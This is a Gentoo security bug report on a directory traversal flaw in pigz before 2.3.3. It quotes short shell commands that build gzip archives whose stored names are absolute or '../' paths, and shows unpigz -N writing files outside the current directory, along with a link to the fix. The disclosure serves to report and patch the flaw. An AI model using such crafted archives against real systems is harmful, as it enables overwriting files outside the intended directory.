Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 536450 - <app-arch/pigz-2.3.3: directory traversal vulnerability
Summary: <app-arch/pigz-2.3.3: directory traversal vulnerability
Status: RESOLVED OBSOLETE
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal minor (vote)
Assignee: Gentoo Security
URL: https://bugs.debian.org/cgi-bin/bugre...
Whiteboard: B4 [noglsa]
Keywords:
Depends on:
Blocks:
 
Reported: 2015-01-13 08:43 UTC by Agostino Sarubbo
Modified: 2016-02-26 13:49 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Agostino Sarubbo gentoo-dev 2015-01-13 08:43:10 UTC
From ${URL} :

pigz is susceptible to directory traversal vulnerabilities. While 
decompressing a file with restoring file name, it (unlike gzip) will 
happily use absolute and relative paths taken from the input. This can 
be exploited by a malicious archive to write files outside the current 
directory.

1. Absolute path.

A sample could be prepared in following way:

$ touch XtmpXabs
$ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz
$ rm XtmpXabs

Then check it works:

$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory

$ unpigz -N abs.gz

$ ls /tmp/abs
/tmp/abs

2. Relative path with "..".

A sample could be prepared in following way:

$ rm ../rel
$ touch XXXrel
$ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz
$ rm XXXrel

Then check it works:

$ ls ../rel
ls: cannot access ../rel: No such file or directory

$ unpigz -N rel.gz

$ ls ../rel
../rel



fix:
https://github.com/madler/pigz/commit/fdad1406b3ec809f4954ff7cdf9e99eb18c2458f


@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
Comment 1 Aaron Bauman (RETIRED) gentoo-dev 2016-02-26 13:49:44 UTC
app-arch/pigz-2.3.3 in tree and stable.  No vulnerable versions in tree.  Fix link in previous comment.  GLSA Vote: No